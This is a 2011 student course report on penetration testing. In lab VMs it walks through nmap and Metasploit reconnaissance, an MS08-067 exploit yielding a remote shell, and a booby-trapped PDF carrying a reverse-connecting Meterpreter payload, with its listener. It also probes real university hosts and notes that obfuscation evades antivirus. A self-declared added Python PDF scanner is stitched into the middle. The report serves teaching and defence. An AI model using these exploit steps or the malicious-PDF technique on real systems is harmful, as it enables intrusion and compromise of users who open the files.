MIEIC - SSIN (Computer Security)




Tomé Duate, Robert Kulzer
Final report, Group 5, T9, 2011/2012
December 6, 2011

1 Introduction

There are numerous studies on malware development over the past decade, and they all show rapid growth over the last years. Please refer to figure 1 for one of these malware statistics.

Figure 1: Number of Entries on the Google Safe Browsing Malware List

Many software developers pay little attention to possible security flaws while developing applications. A common mistake is to think that security can be added later on. Writing robust code means thinking about security from the beginning to the end.

2 Goals

In this project we want to raise awareness among our fellow students of the need to write secure code, by showing how software can be exploited. We want to provide knowledge of certain tools for checking for vulnerabilities, from the network layer up to the application layer. Moreover, we want to explain the value of penetration testing and why it is crucial for today's companies. We follow the general guidelines for a penetration tester [1]:

1. Pre-engagement Interactions
2. Intelligence Gathering
3. Threat Modeling
4. Vulnerability Analysis
5. Exploitation
6. Post Exploitation
7. Reporting

As penetration tests are conducted as Black box and/or White box tests, we explain and outline the differences between these two paradigms. Furthermore, we point to noteworthy web sites for getting more involved in the matter. In addition, there is a large variety of security tools any interested student should be aware of and may want to try; all of this information is included in this work. We also state the legal concerns that have to be taken into account before starting a penetration test.

3 Approach

The attacked machines in this demonstration are virtual machines. This is a close to real world example without harming actual machines. The whole demonstration follows the penetration testing guideline introduced in section 2 (Goals). The first machine is a standard Windows XP installation with service pack 3 installed; it is called WinXPSP3. The other machine is a standard Windows 7 installation with service pack 1. This example should demonstrate that even newer systems can be compromised; the machine is called Win7. In both cases the attacker is in the same network as the victim, and there is no firewall, VPN, IDS or anything else shielding the targets.

3.1 Metasploit

Many penetration testers use security frameworks for their work. They provide a more convenient and efficient way to manage scans and vulnerabilities, so certain tasks can be performed much faster. Metasploit is such a framework [2]: it is open-source and is used to retrieve information on vulnerabilities of targeted systems.

3.2 Other software

- Armitage is a GUI to the Metasploit framework [3]
- nmap is a free and open source utility for network exploration or security auditing [4]
- whois looks up the registered users or assignees of an Internet resource (such as a domain name, an IP address, and so on)
- host is a DNS lookup utility
- telnet is a network protocol (and client) for connecting to specified ports on a remote host
- and many more...

4 Getting in touch with the target

4.1 Pre-engagement Interactions

The Penetration Tester's Guide [1] defines this stage as the negotiation point. Here the security engineer and the client meet and discuss the terms of the security evaluation. The point of this contract is to define the goal of the endeavour. Furthermore, the penetration tester may decide on a Black box and/or White box test. The Black box test is performed without knowledge of the internal structure/routines of the targeted system.
They are mainly used to test whether the specifications are implemented in the way they are

meant to be. In terms of penetration testing, this test is considered a real world example. The White box test is the opposite: here the internals are known. Thus, the penetration tester can launch wider scale tests against a system from the inside. This approach simulates a malicious actor on the inside, who has the authorization to access sensitive areas guarded by various mechanisms. The hybrid method, sometimes referred to as Grey box testing, assumes the security engineer has some knowledge of the internals, but does not have credentials to obtain higher security clearance. This level can be reached after gathering intelligence on the targeted system, while still being at a basic user level. Depending on company policy, it may be interesting to keep the employees (including the IT department) unaware of a penetration test.

Figure 2: Black and White box testing

4.2 Intelligence Gathering

In this stage the penetration tester tries to gather as much information on the targeted system as possible. The more information he gathers, the more elaborate his attacks and results can be. Common techniques are fingerprinting of hosts, Google hacking, social engineering and so on. The security engineer wants to identify the defence systems within the network, such as Intrusion Detection Systems (IDS) [6], firewalls, honeypots [5] and the like. Depending on the strategy, the penetration tester may want to be as noisy as possible to attract attention, or silent to stay under the radar of the defence systems. He could also combine both strategies to distract the defence systems from the actual attack, using different IP ranges and heavy port scans. There are numerous scenarios for performing the penetration test; the attacker selects appropriate measures depending on the given configuration of the network.

    # nmap -sS -PN WinXPSP3
    Starting Nmap 5.21 ( http://nmap.org )
    Nmap scan report for WinXPSP3
    Host is up (0.0010s latency).
    Not shown: 997 closed ports
    PORT    STATE SERVICE
    135/tcp open  msrpc
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds
    MAC Address: 08:00:27:18:22:B6 (Cadmus Computer Systems)

Listing 1: Default nmap scan on single host

A very basic nmap scan on WinXPSP3 (refer to listing 1) provides information on the open ports. This gives the attacker a basic idea of which services are running on a machine and may have flaws. The option -sS uses a TCP SYN as the connection attempt (no full connection is established) and -PN skips host discovery, assuming the host is online. These two switches are a very basic way to stay a little quieter. If nmap were used without any options, a connection would be established, hence the scanned host's process would most certainly be aware of the connection attempt. There are more elaborate approaches to minimise the noise. With the so called TCP idle scan the attacker can spoof the IP address of another host in the network and thus evade detection. In order to perform this method, one has to identify hosts in the network that use incremental IP IDs (the packet fragment identification number). The Metasploit framework comes with such a scanner; its use is shown in listing 2.

    msf > use auxiliary/scanner/ip/ipidseq
    msf auxiliary(ipidseq) > set RHOSTS 192.168.56.0/24
    msf auxiliary(ipidseq) > set THREADS 50
    msf auxiliary(ipidseq) > run
    [*] Scanned 045 of 256 hosts (017% complete)
    [*] Scanned 086 of 256 hosts (033% complete)
    [*] Scanned 095 of 256 hosts (037% complete)
    [*] 192.168.56.101's IPID sequence class: Incremental!
    ...
    [*] Auxiliary module execution completed
    msf auxiliary(ipidseq) > nmap -PN -sI 192.168.56.101 WinXPSP3

Listing 2: Metasploit TCP idle scan

Listing 2 shows that the host with IP address 192.168.56.101 is a valid candidate for a TCP idle scan.
The option -sI tells nmap that the following hostname or IP address is a so called zombie host, used for the scan. Listing 3 shows another useful nmap option, -A, to gather more information on a target system: not just the fingerprint of the OS running on the target, but also whether there are routers in between (here the network distance is 1 hop).

    # nmap -sS -PN -A WinXPSP3
    Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-12 18:59 WET
    Nmap scan report for WinXPSP3
    Host is up (0.0014s latency).
    Not shown: 997 closed ports
    PORT    STATE SERVICE      VERSION
    135/tcp open  msrpc        Microsoft Windows RPC
    139/tcp open  netbios-ssn
    445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
    MAC Address: 08:00:27:18:22:B6 (Cadmus Computer Systems)
    Device type: general purpose
    Running: Microsoft Windows XP
    OS details: Microsoft Windows XP SP2 or SP3
    Network Distance: 1 hop
    Service Info: OS: Windows
    Host script results:
      nbstat: NetBIOS name: HACKME, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:18:22:
      smb-os-discovery: OS: Windows XP (Windows 2000 LAN Manager)
        Name: WORKGROUP\HACKME
        System time: 2011-11-15 18:59:38 UTC+1
      smbv2-enabled: Server doesn't support SMBv2 protocol
    HOP RTT     ADDRESS
    1   1.38 ms 192.168.56.102
    OS and Service detection performed.

Listing 3: Nmap OS discovery

But nmap is not the only tool for gathering information on the network and its hosts. Classic UNIX tools like whois, host and ettercap, but also capable tools like the network sniffer wireshark [7] and openvas [8], serve the penetration tester in gathering intelligence. Listing 4 shows the host and whois output for up.pt. At first glance this information does not seem to be of any value to a penetration tester, but the mail servers and DNS servers have already been identified without making contact with any of the up.pt hosts. This information is especially valuable if the security engineer is evaluating in a Black box scenario.

    # host -t mx up.pt
    up.pt mail is handled by 20 relay2.up.pt.
    up.pt mail is handled by 10 relay1.up.pt.
    # whois up.pt
    Titular / Registrant
    Universidade do Porto - Reitoria
    Praça Gomes Teixeira
    Porto
    4099-002 Porto
    Email: contacto-dnsup@reit.up.pt
    ...
    Nameserver Information
    Nameserver: up.pt NS dns1.up.pt.
    ...
    Nameserver: dns3.up.pt. A 193.137.35.100
    Nameserver: dns4.up.pt. A 193.136.37.106
    ...
    Nameserver: dns3.up.pt. AAAA 2001:690:2200:b10::100

Listing 4: Host and whois queries on up.pt

5 Pin-point the target system

5.1 Threat Modeling

In this stage the attacker isolates the most promising approach. He looks for the most effective attack according to the specifications agreed in section 4.1 (Pre-engagement Interactions). Here the penetration tester works as an adversary trying to penetrate the system would. Identifying vulnerabilities and security flaws in a system is not an easy task. As explained in section 4.2, the attacker has to operate cautiously. The security engineer knows which ports are open. Now he wants to learn which software uses each port and which version of that program is running. Listing 5 shows an example of how to identify the web server software and its version. The output states Apache version 2.2.3, and that the server runs on Linux, the SuSE Linux distribution. This output can be cross-checked with the findings from OS fingerprinting.

    # telnet www.fe.up.pt 80
    Trying 193.136.28.205...
    Connected to sifeup.fe.up.pt (193.136.28.205).
    Escape character is '^]'.
    GET /index.html HTTP/1.1

    HTTP/1.1 400 Bad Request
    Date: Sat, 12 Nov 2011 14:25:34 GMT
    Server: Apache/2.2.3 (Linux/SUSE)
    Content-Length: 226
    Connection: close
    Content-Type: text/html; charset=iso-8859-1

Listing 5: Determine the web server version

The 400 Bad Request is the server's reaction to an HTTP/1.1 request without a Host header; the Server header is returned regardless, which is all that matters here. With this information the attacker may proceed to web sites like www.exploit-db.com to obtain information on recently discovered vulnerabilities in Apache version 2.2.3, or search with Metasploit. Yet another way to discover vulnerabilities is to use nmap scripts: nmap can also scan hosts for certain vulnerabilities. Moreover, scripts for the nmap scripting engine (NSE) [10] can easily be developed by users and are publicly available. Listing 6 shows an smb scan on WinXPSP3.
The output reports the MS08-067 vulnerability [9]. This critical flaw allows remote code execution, which gives the attacker remote access and thereby compromises the entire system.

    # nmap -A -sS -PN WinXPSP3 --script=smb-check-vulns
    ...
    NSE: Script Scanning completed.
    Nmap scan report for WinXPSP3
    Host is up (0.0013s latency).
    ...
    Device type: general purpose
    Running: Microsoft Windows XP
    OS details: Microsoft Windows XP SP2 or SP3
    Network Distance: 1 hop
    Service Info: OS: Windows
    Host script results:
      smb-check-vulns:
        MS08-067: LIKELY VULNERABLE
        Conficker: Likely CLEAN
        regsvc DoS: CHECK DISABLED
        SMBv2 DoS (CVE-2009-3103): CHECK DISABLED

Listing 6: Nmap smb vulnerability scan

5.2 Vulnerability Analysis

This stage is concerned with the question of how to gain access to the system. Here the security engineer puts together the data gathered up to this point to develop the most effective method of executing the attack. For this work we select the MS08-067 exploit, as it grants total access to the system.

6 Exploitation Process

6.1 Exploitation

After careful planning and information gathering the actual attack can be carried out. Unlike in the Intelligence Gathering stage (section 4.2), the attacker should now proceed as silently as possible; massive and random launches of exploits are usually not the way to go in this stage. Listing 7 shows how easily remote access can be obtained using the Metasploit framework. In this scenario the command-line version of Metasploit is used. First, the IPv4 address of the attacker's machine is set. The payload is the code which will be executed on the target by abusing the vulnerability; in this case the payload is a remote shell listening on port 4444 on the victim's machine. In the next step, the MS08-067 vulnerability is searched for via the search function provided by the Metasploit framework. After locating the right exploit module, it is loaded and the penetration tester may configure the attack further.

The available parameters can be viewed by showing the options. The required fields are marked and have to be provided. After setting all the essential parameters the actual exploit can be started.

    msf > set LHOST 192.168.56.1      <-- attacking machine
    LHOST => 192.168.56.1
    msf > set PAYLOAD windows/shell/bind_tcp
    PAYLOAD => windows/shell/bind_tcp
    msf > search ms08_067
    Matching Modules
    ================
    Name                          Disclosure Date  Rank   Description
    exploit/.../ms08_067_netapi   2008-10-28       great  Microsoft ...
    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > show options
    Module options (exploit/windows/smb/ms08_067_netapi):
    Name     Current Setting  Required  Description
    RHOST                     yes       The target address
    RPORT    445              yes       Set the SMB service port
    SMBPIPE  BROWSER          yes       The pipe name
    ...
    Payload options (windows/shell/bind_tcp):
    Name      Current Setting  Required  Description
    EXITFUNC  thread           yes       Exit technique: seh, ...
    LPORT     4444             yes       The listen port
    RHOST                      no        The target address
    Exploit target:
    Id  Name
    0   Automatic Targeting
    msf exploit(ms08_067_netapi) > set RHOST WinXPSP3
    RHOST => WinXPSP3
    msf exploit(ms08_067_netapi) > set target 6
    target => 6
    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler
    [*] Attempting to trigger the vulnerability...
    [*] Sending stage (240 bytes) to WinXPSP3
    [*] Command shell session 1 opened (192.168.56.1:33050 -> WinXPSP3:4444) at 2011-11-12
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\WINDOWS\system32>

Listing 7: Getting a remote shell after the MS08-067 exploit

There are of course numerous payloads to choose from. One of the most intriguing is Meterpreter [11]; this payload gives the penetration tester a wide range of tools and mechanisms to control the client. As the attacker may want to use one or more of the compromised systems as a platform for further attacks inside the network, Meterpreter can be a valuable asset for keeping control of the attacked systems.

6.1.1 Meterpreter

Meterpreter is short for Meta-Interpreter, an advanced payload for the Metasploit framework. It provides a much easier way to a richer feature set for the framework; the alternative would be a lot of assembly code, which can be very exhausting. Meterpreter operates only in memory, which helps it stay undetected. Figures 3 and 4 show the interface of Armitage.

6.2 Using application exploits

Nowadays, operating systems are no longer the main target of malware developers [12]. Injection, XSS and misconfigured session management are much more pressing topics for security engineers. In addition, social engineering is still one of the most effective ways to compromise a system. Here is an example of embedding malicious code in a benign looking pdf file. When the file is opened with Adobe Reader [13] (version 8.x and 9.x) it executes the malicious code.
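A defender-side check for documents built the way this section describes, added here as an example and not taken from the report or from Metasploit: a Python scanner that flags PDFs carrying an embedded file together with a launch action, looking past the #xx name escapes and FlateDecode streams that hide such tokens from a plain string search. The sample PDFs are constructed inside the code.

```python
"""Static triage for PDFs of the kind section 6.2 describes: an embedded file
plus a launch action that runs it. Added example, not the report's or
Metasploit's code. It looks for risky PDF name tokens after undoing the #xx
escape that PDF allows inside names and after inflating FlateDecode streams,
two common ways such tokens are hidden from naive string matching.
"""
import re
import zlib

RISKY = ("/EmbeddedFile", "/EmbeddedFiles", "/Launch", "/JavaScript", "/JS",
         "/OpenAction", "/AA", "/RichMedia")


def decode_names(data: bytes) -> bytes:
    """Undo hex escapes in names: /Laun#63h becomes /Launch."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Append the inflated body of every FlateDecode stream to the data so the
    scan also sees tokens stored inside compressed objects. A truncated
    stream still yields its partial output; a malformed one is skipped."""
    parts = [data]
    for m in re.finditer(rb"/FlateDecode.*?stream\r?\n(.*?)endstream",
                         data, re.S):
        try:
            parts.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass  # not a valid zlib stream: leave it for manual review
    return b"\n".join(parts)


def naive_hits(data: bytes) -> set:
    """What a plain substring search sees, for comparison."""
    return {tok for tok in RISKY if tok.encode() in data}


def scan_pdf(data: bytes) -> dict:
    """Return {token: occurrences} for every risky token present."""
    text = decode_names(inflate_streams(data))
    found = {}
    for tok in RISKY:
        # a name ends at a delimiter or whitespace, so /EmbeddedFile must not
        # be counted inside /EmbeddedFiles and /JS not inside /JSomething
        pattern = re.escape(tok.encode()) + rb"(?![A-Za-z0-9_])"
        n = len(re.findall(pattern, text))
        if n:
            found[tok] = n
    return found


def verdict(found: dict) -> str:
    """Map the findings to a triage decision."""
    if "/Launch" in found and ("/EmbeddedFile" in found
                               or "/EmbeddedFiles" in found):
        return "embedded file with launch action: quarantine and analyse offline"
    if found:
        return "active content present: review before opening"
    return "no risky tokens found"


def build_sample(suspicious: bool) -> bytes:
    """Constructed minimal PDF for the demo (not a real document). The
    suspicious variant hides /Launch behind a hex escape and keeps the
    /EmbeddedFile object inside a compressed stream."""
    catalog = b"<< /Type /Catalog /Pages 2 0 R"
    if suspicious:
        catalog += b" /OpenAction << /S /Laun#63h /F (demo.exe) >>"
    objs = [catalog + b" >>", b"<< /Type /Pages /Kids [] /Count 0 >>"]
    if suspicious:
        body = zlib.compress(b"<< /Type /EmbeddedFile /Length 0 >>")
        objs.append(b"<< /Filter /FlateDecode /Length %d >>\nstream\n" % len(body)
                    + body + b"\nendstream")
    out = [b"%PDF-1.4"]
    for i, obj in enumerate(objs, 1):
        out.append(b"%d 0 obj\n" % i + obj + b"\nendobj")
    out.append(b"trailer << /Root 1 0 R >>\n%%EOF")
    return b"\n".join(out)
```

On the constructed suspicious sample the plain substring search sees only /OpenAction, while the full scan also recovers /Launch and /EmbeddedFile and returns the quarantine verdict.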
6.2.1 Malicious pdf

Listing 8 shows the way to create a malicious pdf file, using the Metasploit framework to embed code in an originally legitimate document.

Figure 3: Armitage interface, after scanning the network

Figure 4: Meterpreter session opened after compromising Win7

    msf > search adobe pdf embedded
    Matching Modules
    ...
    msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
    msf ... > set FILENAME <output path>/buhu_m.pdf
    FILENAME => <output path>/buhu_m.pdf
    msf ... > set INFILENAME <input path>/IPTablesFlowChart.pdf
    INFILENAME => <input path>/IPTablesFlowChart.pdf
    msf ... > set LAUNCH_MESSAGE Foobar
    LAUNCH_MESSAGE => Foobar
    msf ... > set LHOST 192.168.56.1
    LHOST => 192.168.56.1
    msf ... > show options
    Module options (exploit/windows/fileformat/adobe_pdf_embedded_exe):
    Name            Current Setting
    EXENAME
    FILENAME        <output path>/buhu_m.pdf
    INFILENAME      <input path>/IPTablesFlowChart.pdf
    LAUNCH_MESSAGE  Foobar
    Payload options (windows/meterpreter/reverse_tcp):
    Name      Current Setting  Required  Description
    EXITFUNC  process          yes       Exit technique: seh, ...
    LHOST     192.168.56.1     yes       The listen address
    LPORT     4444             yes       The listen port
    ...
    msf exploit(adobe_pdf_embedded_exe) > exploit
    [*] Reading in <input path>/IPTablesFlowChart.pdf...
    [*] Parsing <input path>/IPTablesFlowChart.pdf...
    [*] Parsing Successful.
    [*] Using windows/meterpreter/reverse_tcp as payload...
    [*] Creating <output path>/buhu_m.pdf file...
    [+] <output path>/buhu_m.pdf

Listing 8: Embedding malicious code in a pdf file using Metasploit

The hard part of the penetration tester's work is now to convince a victim to open this document in a version of Adobe Reader that has this vulnerability. Before the victim opens the document, the attacker has to make sure that a connection handler is waiting for incoming connections, see listing 9.

    msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.56.1
    LHOST => 192.168.56.1
    msf exploit(handler) > exploit
    [*] Started reverse handler on 192.168.56.1:4444
    [*] Starting the payload handler...

Listing 9: Generate a generic listener using Metasploit

After completing these steps, the penetration tester should see the incoming connection. Please refer to figure 5 to see Meterpreter with Armitage in action.

Figure 5: Taking a screenshot from the running compromised machine

However, this is a rather simple approach. This attempt would most certainly fail if the machine used a virus scanner. Checking the file with the online malware scanner virustotal.com [14] shows that most of the antivirus engines identify this malformed pdf document; see figure 6 for the results. On the other hand, it is not so difficult to prevent detection by virus scan engines: obfuscation techniques can render the scanners ineffective.

6.3 Post Exploitation

After successfully compromising one or more systems, the penetration tester wants to gather valuable information and intelligence. The security engineer wants to expose the most secure systems in the network, the ones the organization is trying to protect the most. In a software company this may be their repository; a bank tries to shield its financial services. These are the systems the penetration tester is after. As it may be easier to compromise an insignificant host first, the penetration tester may then use this machine to go on to more protected systems. Here Metasploit, or more precisely Meterpreter, provides options for staying on attacked machines, for example by migrating from the process used for the attack to another one, to stay undetected.

Figure 6: Virustotal scan on the embedded Meterpreter pdf document.

7 Reporting

The organization that hires penetration testers expects them to reveal vulnerabilities in its networks and how they can be exploited. Hence, this stage is one of the most important. It is not just the holes in the security systems that a penetration tester uncovers, but he is also

supposed to raise awareness of the flaws in their configuration, to hinder upcoming attacks. The security engineer will also provide solutions to the discovered vulnerabilities and, if possible, ways to eliminate them on a broader scale. For example, if SQL injections are possible, the input at these points should be sanitized, but the underlying problem still remains. He may also show alternatives, if possible, to eliminate the problem entirely. As for the examples in this work, most of the vulnerabilities are caused by outdated applications. These security holes can be closed rather easily. But there are still numerous ways to find an entrance into an environment that is considered secure.

8 Conclusion

Even though nowadays many companies and governments invest more money in their IT security departments, the number of news reports about compromised databases, industrial espionage and so on is still rising. Organized crime has discovered the huge potential profit in online crime. But crash kids (aka script kiddies) and self-appointed freedom fighters are also a threat to the data each one of us wants to protect. Penetration tests can be one instrument to unveil security flaws in networks and systems. These security engineers operate as if they were hackers, but they have permission from the organization that hired them. It is most certainly not a magic formula to prevent future attacks, but it raises the bar an attacker would have to surpass in order to gain access. Professional attackers have a business plan just as companies do: if the amount of resources invested is higher than the expected profit, they will most likely reconsider their attack plans. Hackers who attack for fun or prestige will also have to spend more of their time breaking into systems previously tested by penetration testers. Furthermore, penetration testers can help raise awareness of vulnerabilities in software, but also of social engineering.

References

[1] David Kennedy, Jim O'Gorman, Devon Kearns, and Mati Aharoni. Metasploit - The Penetration Tester's Guide. ISBN: 978-1-59327-288-3
[2] Rapid7 LLC. Metasploit Framework. http://www.metasploit.com/
[3] Raphael Mudge. Cyber attack management for Metasploit. http://www.fastandeasyhacking.com/
[4] Gordon Lyon. nmap - Discovering hosts and services on a computer network. http://nmap.org/
[5] Provos, N. A virtual honeypot framework. Proceedings of the 13th conference on USENIX Security Symposium, Volume 13 (2004)
[6] Rowland, C.H. Intrusion detection system (IDS). US Patent 6,405,318
[7] The Wireshark team. Wireshark - The free and open-source packet analyzer. http://www.wireshark.org/
[8] Greenbone Networks GmbH. OpenVAS - Framework for vulnerability scanning. http://www.openvas.org/
[9] Microsoft. MS08-067 - Vulnerability in Server Service Could Allow Remote Code Execution. http://technet.microsoft.com/en-us/security/bulletin/ms08-067
[10] Various developers, initially the nmap developers. Nmap scripts to automate a wide variety of networking tasks. http://nmap.org/book/nse.html
[11] Metasploit developers. Meterpreter - Advanced payloads for the Metasploit Framework. http://www.offensive-security.com/metasploit-unleashed/metasploit_about_Meterpreter
[12] Open Web Application Security Project (OWASP). OWASP is an open-source application security project. https://www.owasp.org/index.php/category:owasp_top_ten_project
[13] Adobe Systems. Adobe Reader - Used to view and print PDF files. http://www.adobe.com/products/reader.html
[14] Virustotal.com - Hispasec Sistemas. Free checking of suspicious files using multiple antivirus engines. http://www.virustotal.com/